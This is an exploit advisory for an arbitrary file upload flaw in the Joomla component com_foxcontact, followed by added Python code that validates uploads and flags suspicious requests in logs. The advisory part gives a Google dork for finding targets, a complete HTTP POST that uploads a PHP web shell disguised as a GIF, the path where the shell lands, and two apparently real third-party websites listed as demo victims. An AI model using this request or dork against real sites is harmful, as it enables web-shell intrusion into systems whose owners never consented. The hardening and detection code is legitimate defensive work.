Joomla Component com_foxcontact Arbitrary File Upload Shell Vulnerability

##########################
# Exploit Title: Joomla Component com_foxcontact Arbitrary File Upload Shell Vulnerability
# Google Dork: allinurl:index.php?option=com_foxcontact
# We Are Iranian Anonymous
# Home: Iranonymous.org
# Discovered By: Hacker Khan
# Vendor Home: http://www.fox.ra.it/
# Version: 1.0
# Tested on: Linux, Windows 7
##########################

# Exploit - HTTP Header Example -

POST http://www.cavedegruissan.com/particulars/components/com_foxcontact/lib/file-uploader.php?cid=289&mid=0&qqfile=shell.php HTTP/1.1
Host: www.cavedegruissan.com
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-File-Name: shell.php
Content-Type: image/jpeg
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

GIF89a<?php shell ?>

############################
# Shell path: www.site.com/components/com_foxcontact/uploads/filename.php
###########################

# Demo:
http://www.cavedegruissan.com/component/hikashop/FT/index.php?option=com_foxcontact&view=foxcontact&Itemid=131
http://www.nebulaagencies.com.au/index.php?option=com_foxcontact&view=foxcontact&Itemid=113

##############################
# Thanks to: MR.Khatar || ll_azab-siyah_ll || Rising || Blackwolf_Iran || Ormazd || Sh@d0w || MaMaD_Malware || OnE_H4Ck3R || Shdmehr || B.D Happy Boy || MR.zarvan || Security Soldier || And All Of Iranian Anonymous.
# Discovered By: Hacker Khan
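The request above succeeds because the upload handler takes the file name from the client (`qqfile` / `X-File-Name`) and the file type from the client's `Content-Type` header, so a body that starts with a GIF signature and continues with PHP is stored under a `.php` name inside the web root. The following is an added example, not code from com_foxcontact or from the advisory's author: it shows the server-side checks that reject exactly this request (extension allowlist, declared type versus extension, declared type versus magic bytes, and a scan for embedded PHP open tags, with a server-chosen file name), plus a small detector that flags requests to the uploader path in constructed access-log lines whose `qqfile` is not an allowlisted image. The allowed image types, the log format and the sample log lines are assumptions for the example.

```python
"""Hardened upload validation for the com_foxcontact-style upload pattern.

Added example (not the component's code). A naive handler trusts the
client-supplied qqfile name and Content-Type header; the checks below reject a
"shell.php" upload declared as image/jpeg with a GIF89a<?php ... ?> body on
several independent grounds, and never reuse the client's file name.
"""
import os
import re
import secrets
import urllib.parse
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Assumption: a contact form only needs these image types as attachments.
# Extension -> magic bytes the body must start with.
ALLOWED_TYPES = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
# Declared MIME type -> extensions it may legitimately carry.
MIME_TO_EXT = {
    "image/jpeg": {".jpg", ".jpeg"},
    "image/png": {".png"},
    "image/gif": {".gif"},
}
# PHP open tag anywhere in the body: "<?php", "<?=" or "<? " (polyglot check).
PHP_TAG = re.compile(rb"<\?(php|=|\s)", re.IGNORECASE)


@dataclass
class UploadDecision:
    accepted: bool
    reasons: List[str] = field(default_factory=list)
    stored_name: Optional[str] = None


def validate_upload(client_name: str, content_type: str, body: bytes) -> UploadDecision:
    """Decide whether an upload may be written to disk; collect every failing check."""
    reasons: List[str] = []
    # 1. Allowlist on the *last* suffix, so shell.php and shell.jpg.php both fail.
    ext = os.path.splitext(os.path.basename(client_name))[1].lower()
    if ext not in ALLOWED_TYPES:
        reasons.append(f"extension {ext or '(none)'} not in allowlist")
    # 2. The declared Content-Type must be allowed and must agree with the extension.
    mime = content_type.split(";")[0].strip().lower()
    mime_exts = MIME_TO_EXT.get(mime, set())
    if not mime_exts:
        reasons.append(f"Content-Type {mime!r} not allowed")
    elif ext not in mime_exts:
        reasons.append(f"Content-Type {mime!r} does not match extension {ext!r}")
    # 3. The body's magic bytes must match the *declared* type, not just some image type
    #    (GIF89a under image/jpeg is rejected here).
    magics = tuple(m for e in mime_exts for m in ALLOWED_TYPES[e])
    if magics and not body.startswith(magics):
        reasons.append("body magic bytes do not match declared Content-Type")
    # 4. A valid image header followed by PHP is still rejected.
    if PHP_TAG.search(body):
        reasons.append("body contains a PHP open tag")
    if reasons:
        return UploadDecision(False, reasons)
    # Server-chosen name: random token plus the validated extension; the client
    # name is never used as a path component.
    return UploadDecision(True, [], secrets.token_hex(16) + ext)


# --- Detection over access logs -------------------------------------------
UPLOADER_PATH = "/components/com_foxcontact/lib/file-uploader.php"
# Assumption: Apache/nginx combined log format.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})')


def suspicious_upload_requests(log_lines) -> List[Tuple[str, str]]:
    """Return (request path, qqfile) for uploader requests naming a non-image file."""
    hits = []
    for line in log_lines:
        m = LOG_RE.search(line)
        if not m or UPLOADER_PATH not in m.group("path"):
            continue
        query = urllib.parse.urlsplit(m.group("path")).query
        for name in urllib.parse.parse_qs(query).get("qqfile", []):
            if os.path.splitext(name)[1].lower() not in ALLOWED_TYPES:
                hits.append((m.group("path"), name))
    return hits


# Constructed sample log lines (RFC 5737 documentation addresses, not real traffic).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2014:10:00:00 +0000] "POST /components/com_foxcontact/lib/file-uploader.php?cid=289&mid=0&qqfile=shell.php HTTP/1.1" 200 87',
    '198.51.100.7 - - [01/Jan/2014:10:00:05 +0000] "POST /components/com_foxcontact/lib/file-uploader.php?cid=289&mid=0&qqfile=photo.jpg HTTP/1.1" 200 87',
    '198.51.100.8 - - [01/Jan/2014:10:00:09 +0000] "GET /index.php?option=com_foxcontact&view=foxcontact&Itemid=131 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    # The request from the advisory, reconstructed as the handler would see it.
    print(validate_upload("shell.php", "image/jpeg", b"GIF89a<?php shell ?>"))
    print(validate_upload("photo.jpg", "image/jpeg", b"\xff\xd8\xff\xe0" + b"\x00" * 16))
    print(suspicious_upload_requests(SAMPLE_LOG))
```

The order of the checks matters less than their independence: the advisory's request fails all four, and a polyglot that declares `image/gif`, starts with `GIF89a` and ends in `.gif` still fails the PHP-tag scan. Serving the upload directory with script execution disabled (for example a web server rule that refuses to execute `.php` under `components/com_foxcontact/uploads/`) is the complementary control when the validator itself has a gap.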